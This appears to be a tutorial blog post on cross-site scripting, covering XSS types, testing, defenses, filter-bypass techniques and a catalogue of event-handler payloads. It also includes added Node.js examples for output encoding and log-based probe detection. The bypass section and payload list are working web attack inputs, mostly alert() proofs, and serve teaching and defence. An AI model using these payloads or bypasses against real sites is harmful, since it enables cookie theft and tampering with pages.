XSS vulnerability
2022-06-29 19:58:00 【The way to remedy】
Principle
An attacker embeds client-side script, usually malicious JavaScript, in a web page. When a user opens that page in a browser, the malicious code runs in the user's browser and sends the user's information to the attacker.
Classification
Reflected
Reflected XSS, also called non-persistent XSS, is currently the most common kind of XSS vulnerability. When a user requests a URL that carries XSS code, the server receives and processes the data and returns the data containing the XSS code to the browser; the browser parses it, and the XSS vulnerability is triggered. Because the process resembles a reflection, it is called reflected XSS.
Stored
Any web application that lets users store data may have a stored XSS vulnerability. When an attacker submits XSS code, the server receives and stores it; when a user later visits the application, the program reads that XSS code and returns it to the browser, causing a cross-site scripting attack. This is stored XSS.
DOM-based
DOM stands for Document Object Model. The DOM is usually used to represent objects in HTML, XHTML and XML. Through the DOM, programs and scripts can dynamically access and update the content, structure and style of a document. With JavaScript the whole HTML page can be rebuilt, but to rebuild the page or an object in it, JavaScript needs to know the "location" of every element in the HTML document. The DOM provides a structured representation of the document and also defines how scripts access that structure. According to the DOM specification, every component of an HTML document is a node.
Harm
1. Drive-by malware planting on the website ("挂马")
2. Stealing user cookies
3. Modifying page content
4. Redirecting the website
5. XSS worms
Testing for XSS
Manual testing
1. Find every place that accepts input.
2. Enter special characters at each input point and make sure you can find where the output appears.
3. Based on the output format, analyze how the server filters the data, design a payload that may bypass it, and test the bypass.
4. When the output position is unknown, you can test with "/>XSS Test".
Automated detection
Software such as AppScan, AWVS and Burp Suite can effectively detect XSS vulnerabilities, but these large vulnerability scanners detect not only XSS but also SQL injection, file inclusion, application errors and other vulnerabilities. Although such scanners can be configured to detect only XSS, they are not as efficient as dedicated XSS testing tools.
There are many dedicated XSS scanners; well-known ones such as XSSER and XSSF are good choices. Security enthusiasts have also built web services that scan for XSS vulnerabilities, such as http://www.domxssscanner.com/, which is designed to scan for DOM-based XSS. Steps that require SMS verification or filling in a CAPTCHA when submitting a message cannot be completed by tools.
Exploitation methods
Session hijacking
Condition: the server uses only the cookie as the user's authentication information.
Principle: after an XSS attack, the attacker obtains the user's authenticated login cookie. Before the cookie expires, the attacker uses it to log in to the user's account without needing the username and password.
Defense: add HttpOnly (a cookie with HttpOnly cannot be read by script in the browser).
XSS platform
XSSPlatform is an exploitation framework made up of XSS code. It includes the basic functions of obtaining cookies, obtaining HTML source, keylogging, basic-authentication phishing, and so on.
Defense
Filtering: strictly filter the data entered by users.
Escaping: escape sensitive characters.
Encoding: entity-encode the data entered by users.
Add the HttpOnly flag.
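The following Node.js snippet is an added example, not code from the original post. It applies the defenses listed above in working form: entity encoding for data placed in HTML text and attributes, a separate encoder for data placed inside a script block (where entity encoding is not enough), and HttpOnly, Secure and SameSite on the session cookie. The function names, the page template and the sample inputs are the example's own assumptions.

```javascript
// Added example (not from the original post): output encoding for HTML contexts
// plus a Set-Cookie header builder that applies HttpOnly. All inputs below are
// constructed test values.

// Map every character that can break out of an HTML text or attribute context.
// Encoding both quote styles matters: PHP's htmlspecialchars() leaves the single
// quote alone unless ENT_QUOTES is passed, which is exactly the gap that the
// 'onmouseover=' attribute-breakout payload relies on.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;', '`': '&#x60;',
};

function escapeHtml(input) {
  return String(input).replace(/[&<>"'`\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// For untrusted data embedded in a JavaScript string literal, JSON.stringify
// handles quotes and backslashes, and escaping "<" and ">" keeps a literal
// "</script>" inside the data from closing the script block early.
function escapeForJsString(input) {
  return JSON.stringify(String(input))
    .replace(/</g, '\\u003C')
    .replace(/>/g, '\\u003E');
}

// Render a page fragment the way a template engine should: every piece of user
// data is encoded for the context it lands in, so tags and event handlers in
// the data are displayed as text instead of being parsed as markup.
function renderProfile(displayName, bio) {
  return `<h1>${escapeHtml(displayName)}</h1>\n` +
         `<input value="${escapeHtml(bio)}">\n` +
         `<script>var bio = ${escapeForJsString(bio)};</script>`;
}

// Session cookie flags: HttpOnly keeps document.cookie from reading it, Secure
// keeps it off plaintext HTTP, SameSite=Strict stops cross-site sending.
// The id format check is a constructed assumption for this example.
function buildSessionCookie(sessionId, maxAgeSeconds) {
  if (!/^[A-Za-z0-9_-]{16,}$/.test(sessionId)) {
    throw new Error('unexpected session id format');
  }
  return [
    `sid=${sessionId}`, `Max-Age=${maxAgeSeconds}`, 'Path=/',
    'Secure', 'HttpOnly', 'SameSite=Strict',
  ].join('; ');
}

// Usage (constructed inputs): the img payload becomes inert text.
console.log(renderProfile('<img src=x onerror=alert(1)>', "'onmouseover='alert(1)"));
console.log('Set-Cookie: ' + buildSessionCookie('k7Qz9vN2xP4rT8wL1mB6', 3600));
```

The point of the separate `escapeForJsString` is context: an entity-encoded string inside `<script>` is still a different language from HTML, so one encoder does not fit every sink.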
Bypass
Common filter bypass methods
Space filtering: when spaces are filtered, / can be used instead of spaces.
Quote filtering: inside an HTML tag, quotes can simply be omitted; inside JS, backticks can replace single and double quotes. <img src=x onerror=alert(`xss`);>
Bracket filtering: when parentheses are filtered, throw can be used to bypass the filter. The throw statement raises an error when an error occurs. <img src=x onerror="javascript:window.onerror=alert;throw 1">
Keyword filtering
Double writing: some WAFs replace a keyword with an empty string only once; in that case writing the keyword twice can bypass the filter. <scrscriptipt>alert(1);</scrscriptipt>
Mixed case: <sCRiPt>alert(1);</sCrIpT>
String splicing: uses the eval() function. JavaScript's eval() evaluates a JavaScript string and executes it as script code. <img src="x" onerror="a='aler';b='t';c='(1)';eval(a+b+c)"> <img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
Encoding bypasses: Unicode encoding, URL encoding, ASCII encoding, hex, base64
URL address filtering:
Using URL encoding: <img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
Using an IP address: decimal IP, octal IP, hex IP. Inside an HTML tag, // can replace http://. \\ can also be used (under Windows, \ has a special meaning as a path separator, so \\ under Windows is the file protocol; under Linux it is the protocol of the current domain). A Chinese full stop can replace the English period (if you type a Chinese full stop in a domain name, the browser automatically converts it to an English period).
Single-quote closure + htmlspecialchars function bypass: 'onmouseover='alert(/xss/)
JavaScript pseudo-protocol (for filters on "on" event handlers and <script>): "><a href=javascript:alert(/xss/)>
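From the detection side, the bypass tricks above (mixed case, double writing, / in place of spaces, URL encoding, attribute breakout, the javascript: pseudo-protocol) are exactly what a log-based probe detector has to undo before matching. The Node.js snippet below is an added example, not code from the original post or from any scanner named in the "Automated detection" section: it normalizes the query string of each access-log request and runs a small signature list over it. The log lines are constructed, and the signature list illustrates the tricks this page describes rather than being a complete ruleset.

```javascript
// Added example (not from the original post): flag reflected-XSS probes in web
// server access logs. Log lines are constructed; signatures are illustrative.

// Undo the layers a probe hides behind before matching: repeated URL decoding
// (double-encoded probes need more than one pass), numeric HTML entities,
// "/" or control characters standing in for spaces, and mixed case.
function normalize(raw) {
  let s = raw;
  for (let i = 0; i < 3; i++) {
    let decoded;
    try { decoded = decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { break; }
    if (decoded === s) break;
    s = decoded;
  }
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
       .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
  return s.replace(/[\x00\t\n\r\/]+/g, ' ').replace(/\s+/g, ' ').toLowerCase();
}

// Each signature is matched against the normalized text, so case and spacing
// variants collapse onto one pattern.
const SIGNATURES = [
  { name: 'script-tag',     pattern: /<\s*[a-z]*script/ },             // <script>, <sCrIpT>, <scrscriptipt>
  { name: 'event-handler',  pattern: /<\s*[a-z]+[^>]*\bon[a-z]+\s*=/ }, // <img src=x onerror=...>, <svg onload=...>
  { name: 'attr-breakout',  pattern: /['"]\s*on[a-z]+\s*=/ },          // 'onmouseover='alert(...)
  { name: 'javascript-uri', pattern: /javascript\s*:/ },                // <a href=javascript:...>
  { name: 'eval-splice',    pattern: /\beval\s*\(/ },                   // a='aler';b='t';eval(a+b+c)
  { name: 'onerror-throw',  pattern: /window\s*\.\s*onerror\s*=/ },     // bracket-filter bypass via throw
];

// Pull the request target out of a combined-format log line and scan its query
// string, the part most often reflected back into a page.
const REQUEST_RE = /"(?:GET|POST|PUT) (\S+) HTTP\/[\d.]+"/;

function scanLogLine(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return { target: null, hits: [] };
  const target = m[1];
  const query = target.includes('?') ? target.slice(target.indexOf('?') + 1) : '';
  const text = normalize(query);
  const hits = SIGNATURES.filter((sig) => sig.pattern.test(text)).map((sig) => sig.name);
  return { target, hits };
}

function scanLog(lines) {
  return lines.map(scanLogLine).filter((r) => r.hits.length > 0);
}

// Constructed sample log: one benign search, then one line per evasion trick.
const SAMPLE_LOG = [
  '10.0.0.5 - - [29/Jun/2022:19:58:00 +0800] "GET /search?q=xss+vulnerability HTTP/1.1" 200 512',
  '10.0.0.5 - - [29/Jun/2022:19:58:01 +0800] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
  '10.0.0.5 - - [29/Jun/2022:19:58:02 +0800] "GET /search?q=%3CscrScRiPtipt%3Ealert(1)%3C/scrscriptipt%3E HTTP/1.1" 200 512',
  '10.0.0.5 - - [29/Jun/2022:19:58:03 +0800] "GET /profile?name=%3Cimg/src=x/onerror=alert(1)%3E HTTP/1.1" 200 512',
  '10.0.0.5 - - [29/Jun/2022:19:58:04 +0800] "GET /go?url=%2522%253E%253Ca%2520href=javascript%253Aalert(1)%253E HTTP/1.1" 302 0',
  '10.0.0.5 - - [29/Jun/2022:19:58:05 +0800] "GET /item?color=%27onmouseover=%27alert(1) HTTP/1.1" 200 512',
];

for (const r of scanLog(SAMPLE_LOG)) {
  console.log(`${r.target}  ->  ${r.hits.join(', ')}`);
}
```

The normalization step is where most of the value is: a signature written against raw log text misses `<sCrIpT>`, `<img/src=x/onerror=`, and the double-encoded `%253C` just as a naive WAF does. Blocking on these patterns would be brittle for the same reasons the bypass section lists; they are better used to prioritize review and to confirm that output encoding held.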
Common payloads
1. script tag
<script>alert(1);</script>
<script>alert("xss");</script>
2. img tag
<img src=1 onerror=alert(1);>
<img src=1 onerror=alert("xss");>
3. input tag
<input onfocus=alert(1);>
The onfocus event fires when the object receives focus.
<input onblur=alert(1) autofocus><input autofocus>
Focus competition between the two inputs triggers the onblur event:
The autofocus attribute of input specifies that the element should automatically receive focus when the page loads. Through autofocus the element fires its own focus event; this vector makes focus jump to the input element automatically and triggers the focus event, with no user interaction needed.
4. details tag
<details ontoggle=alert(1);>
The <details> tag provides an interactive control that the user can open and close, holding additional details that the user can show or hide. The ontoggle event fires when the user opens or closes the <details> element.
<details open ontoggle=alert(1);>
Using the open attribute of details triggers the ontoggle event without the user clicking.
5. svg tag
<svg onload=alert(1);>
The <svg> tag is used to embed SVG code directly in an HTML page.
6. select tag
<select onfocus=alert(1)></select>
The <select> tag creates a drop-down list.
<select onfocus=alert(1) autofocus>
The autofocus attribute specifies that the element should automatically receive focus when the page loads; this vector makes focus jump to the element automatically and triggers the focus event, with no user interaction needed.
7. iframe tag
<iframe onload=alert(1);></iframe>
The <iframe> tag creates an inline frame containing another document.
8. video tag
<video><source onerror=alert(1)>
The <video> tag defines a video, such as a movie clip or other video stream.
9. audio tag
<audio src=x onerror=alert(1);>
The <audio> tag defines a sound, such as music or other audio stream.
10. body tag
<body onload=alert(1);>
The <body> tag defines the body of the document.
<body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
The onscroll event fires when the element's scroll bar scrolls. Using line breaks together with autofocus, the page scrolls to the focused input automatically, so the event fires without the user clicking.
11. textarea tag
<textarea onfocus=alert(1); autofocus>
The <textarea> tag defines a multi-line text input control.